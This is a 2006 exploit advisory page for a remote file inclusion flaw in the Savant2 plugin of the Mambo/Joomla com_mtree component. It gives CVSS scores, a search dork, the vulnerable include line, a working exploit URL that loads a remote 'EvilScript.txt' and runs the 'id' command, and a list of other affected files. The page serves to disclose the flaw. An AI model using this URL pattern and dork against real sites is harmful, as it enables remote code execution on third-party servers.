Savant2 Remote File Include Vulnerability [For Mambo, Joomla]

2006.08.08
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

>>> Kurdish Security >>> Savant2 Remote File Include Vulnerability >>> Freedom For Ocalan >>> Contact : irc.gigachat.net #kurdhac % www.PatrioticHackers.com >>> Rish : High >>> Class : Remote >>> Script : Savant2 >>> Site : www.phpsavant.com >>> Thanx : kurdishsniper,netqurd,flot,azad,darki,B3g0k,jubni,milex,fearless,kha,kca and other my friends d0rkiz : "com_mtree" ------------------------------------------------------------------------ ---------- /** * Base plugin class. */ global $mosConfig_absolute_path; require_once $mosConfig_absolute_path.'/components/com_mtree/Savant2/Plugin.php'; /** For mambo and joomla http://www.site.com/[mam_jom_path]/components/com_mtree/Savant2/Savant2_ Plugin_stylesheet.php?mosConfig_absolute_path=EvilScript.txt?&cmd=id used link :] Savant2_Compiler_basic.php Savant2_Error_pear.php Savant2_Error_stack.php Savant2_Filter_colorizeCode.php Savant2_Filter_trimwhitespace.php Savant2_Plugin_ahref.php Savant2_Plugin_ahrefcontact.php Savant2_Plugin_ahreflisting.php Savant2_Plugin_ahreflistingimage.php Savant2_Plugin_ahrefmap.php Savant2_Plugin_ahrefownerlisting.php Savant2_Plugin_ahrefprint.php Savant2_Plugin_ahrefrating.php Savant2_Plugin_ahrefrecommend.php Savant2_Plugin_ahrefreport.php Savant2_Plugin_ahrefreview.php Savant2_Plugin_ahrefvisit.php Savant2_Plugin_checkbox.php Savant2_Plugin_cycle.php Savant2_Plugin_dateformat.php Savant2_Plugin_editor.php Savant2_Plugin_form.php Savant2_Plugin_image.php Savant2_Plugin_input.php Savant2_Plugin_javascript.php Savant2_Plugin_listalpha.php Savant2_Plugin_listingname.php Savant2_Plugin_modify.php Savant2_Plugin_mtpath.php Savant2_Plugin_options.php Savant2_Plugin_radios.php Savant2_Plugin_rating.php Savant2_Plugin_stylesheet.php Savant2_Plugin_textarea.php


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top